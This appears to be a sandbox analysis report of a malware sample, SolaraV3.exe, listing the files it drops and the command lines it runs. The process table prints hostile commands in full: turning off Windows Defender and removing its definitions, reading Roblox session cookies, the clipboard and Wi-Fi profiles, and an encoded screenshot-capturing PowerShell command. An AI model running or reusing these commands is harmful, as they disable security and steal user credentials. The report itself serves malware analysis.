Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SolaraV3.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key
|
ASCII text
|
modified
|
||
C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (612), with no line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x261b5efc, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\ ?? ? \Display (1).png
|
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MpCmdRun.log
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\RESF203.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4c2, 9 symbols, created Fri Oct 4 15:28:40 2024,
1st section name ".debug$S"
|
modified
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\libcrypto-1_1.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\libffi-7.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0umvczke.yjq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21u3tjdl.isn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2anuzdex.hfv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nx5tlhe.uy0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_45y04qvf.dom.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5pqqnxlf.mfu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h33ja5af.4yp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hp54fb1q.2gs.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o10m2tcb.yza.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odi1wr22.l0h.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prybmjqg.2sy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qguj5uuh.d2k.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhwlnnpk.ucj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvkwfz0s.3d3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2h1d4le.1dp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1wg00js.dft.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uidiymg4.rdm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2qt1z15.jx2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfbhdf3t.3du.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wt2lezrh.c0x.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt4mjqas.uhw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2jmv5sg.bun.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.0.cs
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (720), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\w0e8R.zip
|
RAR archive data, v5
|
modified
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 49 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\SolaraV3.exe
|
"C:\Users\user\Desktop\SolaraV3.exe"
|
||
C:\Users\user\Desktop\SolaraV3.exe
|
"C:\Users\user\Desktop\SolaraV3.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection
$true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection
AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent
2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ????
????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring
$true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting
Disabled -SubmitSamplesConsent NeverSend
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
2"
|
||
C:\Windows\System32\reg.exe
|
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
2"
|
||
C:\Windows\System32\reg.exe
|
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
2
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\StartUp\??? .scr'"
|
||
C:\Windows\System32\attrib.exe
|
attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-Clipboard
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "systeminfo"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\systeminfo.exe
|
systeminfo
|
||
C:\Windows\System32\reg.exe
|
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show profile
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\attrib.exe
|
attrib -r C:\Windows\System32\drivers\etc\hosts
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
|
||
C:\Windows\System32\attrib.exe
|
attrib +r C:\Windows\System32\drivers\etc\hosts
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "getmac"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\getmac.exe
|
getmac
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com
-Name .ROBLOSECURITY"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com
-Name .ROBLOSECURITY"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
|
||
C:\Program Files\Windows Defender\MpCmdRun.exe
|
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
|
||
C:\Windows\System32\cmd.exe
|
